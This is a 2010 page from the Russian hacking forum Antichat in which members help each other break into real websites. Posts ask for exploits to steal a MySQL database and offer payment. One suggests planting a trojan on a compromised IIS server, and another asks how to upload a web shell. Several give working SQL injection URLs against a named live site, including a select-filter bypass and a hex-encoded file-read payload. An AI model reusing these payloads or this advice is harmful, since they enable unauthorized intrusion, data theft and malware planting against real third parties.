ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #13811  
Старый 13.06.2010, 19:32
Аватар для попугай
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от qq6ka  
актуально.

Смотря какой вебсервер. Если Apache, то обычно его пускают от системного юзверя - можно телнет открыть или даже RemoteDesctop. Если IIS, то права обычно обрезаны по максимуму, а новых сплойтов почти и нет в паблике.
 
Ответить с цитированием

  #13812  
Старый 13.06.2010, 19:57
Аватар для qq6ka
qq6ka
Познающий
Регистрация: 21.05.2010
Сообщений: 37
Провел на форуме:
167126

Репутация: 55
По умолчанию

Цитата:
Сообщение от попугай  
Смотря какой вебсервер. Если Apache, то обычно его пускают от системного юзверя - можно телнет открыть или даже RemoteDesctop. Если IIS, то права обычно обрезаны по максимуму, а новых сплойтов почти и нет в паблике.

Microsoft-IIS/6.0

Правки файлов сайтов нет. Могу диски смотреть, править файлы в корне C:\. Всё через ж***, короче.
 
Ответить с цитированием

  #13813  
Старый 13.06.2010, 20:12
Аватар для DrakonSerg
DrakonSerg
Познающий
Регистрация: 16.04.2009
Сообщений: 81
Провел на форуме:
1096131

Репутация: 45
По умолчанию

Apache/1.3.27 (Unix) (Red-Hat/Linux) FrontPage/5.0.2.2626 mod_ssl/2.8.12 OpenSSL/0.9.6b PHP/4.3.11 mod_perl/1.27 - вот такая система есть у меня. Апач довольно старый, подозреваю, что есть сплойты под него. Только найти не могу.
фтп - Version wu-2.6.2(1)
ssh - SSH-1.99-OpenSSH_3.1p1
подкиньте идейку или рабочий сплойт. В идеале мне нужна MySQL база, но мскл инъекций на сайте не обнаружено. Если достану базу - отблагодарю
 
Ответить с цитированием

  #13814  
Старый 13.06.2010, 20:26
Аватар для попугай
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от qq6ka  
Microsoft-IIS/6.0

Правки файлов сайтов нет. Могу диски смотреть, править файлы в корне C:\. Всё через ж***, короче.

Попробуй в корень диска C:/ троян записать. Вдруг админ решит запустить. Или autoexec поправить.
 
Ответить с цитированием

  #13815  
Старый 13.06.2010, 20:37
Аватар для exT1ma4ka
exT1ma4ka
Новичок
Регистрация: 12.05.2010
Сообщений: 10
Провел на форуме:
37183

Репутация: 0
По умолчанию

подскажите пожалуйста как залить шелл.

ситуация такая: mysql стоит на одной машинке, сайт на другой (хостинг) - есть sql-inj дырка. INTO OUTFILE применить не получится исходя из выше-сказанного (mysql на отдельной машине).

по крайней мере пытался, но пишет:

Error 1: Can't create/write to file '/var/www/пам/data/www/парам/uploads/shell.php' (Errcode: 2)

Последний раз редактировалось exT1ma4ka; 13.06.2010 в 20:42..
 
Ответить с цитированием

  #13816  
Старый 13.06.2010, 20:37
Аватар для FlaktW
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

Фильтруется select, как обойти?

http://www.albumband.cz/pisen.php?id=1+union+select+1,2,3,4,5,6,7+--+
 
Ответить с цитированием

  #13817  
Старый 13.06.2010, 20:42
Аватар для qq6ka
qq6ka
Познающий
Регистрация: 21.05.2010
Сообщений: 37
Провел на форуме:
167126

Репутация: 55
По умолчанию

Цитата:
Сообщение от попугай  
Попробуй в корень диска C:/ троян записать. Вдруг админ решит запустить. Или autoexec поправить.
Ну в теории можно залить ***.exe в веб-папку + правка C:\AUTOEXEC.BAT возможна. Только это нужно троя искать/покупать не палящегося + заставить админа перезагрузить сервер.

Попугай, тебе не нужен шелл? Мне лень возиться.
 
Ответить с цитированием

  #13818  
Старый 13.06.2010, 20:53
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
Cool

Цитата:
Сообщение от FlaktW  
Фильтруется select, как обойти?

http://www.albumband.cz/pisen.php?id=1+union+select+1,2,3,4,5,6,7+--+
select не фильтруется:

Код:
http://www.albumband.cz/pisen.php?id=1+and+substring((select+version()),1,1)=5
фильтруется кое-что другое
 
Ответить с цитированием

  #13819  
Старый 13.06.2010, 23:18
Аватар для RulleR
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию

Цитата:
Сообщение от FlaktW  
Фильтруется select, как обойти?

http://www.albumband.cz/pisen.php?id=1+union+select+1,2,3,4,5,6,7+--+
Код:
http://www.albumband.cz/pisen.php?id=-1+union%0aselect+1,version(),3,4,5,6,7,8
upd: + читалка файлов в 8 поле
Код:
http://www.albumband.cz/pisen.php?id=-1+union%0aselect+1,version(),3,4,5,6,7,0x2e2e2f706973656e2e706870
__________________
Avant que l'ombre...

Последний раз редактировалось RulleR; 13.06.2010 в 23:23..
 
Ответить с цитированием

  #13820  
Старый 14.06.2010, 12:23
Аватар для FlaktW
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

Цитата:
Сообщение от RulleR  
Код:
http://www.albumband.cz/pisen.php?id=-1+union%0aselect+1,version(),3,4,5,6,7,8
upd: + читалка файлов в 8 поле
Код:
http://www.albumband.cz/pisen.php?id=-1+union%0aselect+1,version(),3,4,5,6,7,0x2e2e2f706973656e2e706870
Буду обращаться к вам за советами.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ